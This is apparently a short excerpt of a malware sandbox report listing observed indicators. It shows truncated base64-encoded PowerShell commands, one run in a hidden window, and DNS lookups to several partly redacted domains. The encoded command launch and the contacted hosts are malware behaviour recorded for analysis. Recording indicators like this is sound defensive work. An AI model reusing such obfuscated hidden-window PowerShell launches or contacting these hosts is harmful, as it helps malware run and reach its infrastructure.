Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAHAAbQBlAGcAcgBrAGwAbQBzAG0APQAnAEgAeABtAGIAZABtAHkAawB0AHQAdwAnADsAJABLAGcAdwBuAGkAaQBjAGsAbwBlAH...
- DNS ASK ka###gba.net
- DNS ASK gh###ekhodro.ir
- DNS ASK ta####drmike.com
- DNS ASK sl###bet.com
- DNS ASK k-#.co.il
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAHAAbQBlAGcAcgBrAGwAbQBzAG0APQAnAEgAeABtAGIAZABtAHkAawB0AHQAdwAnADsAJABLAGcAdwBuAGkAaQBjAGsAbwBlAH...' (with hidden window)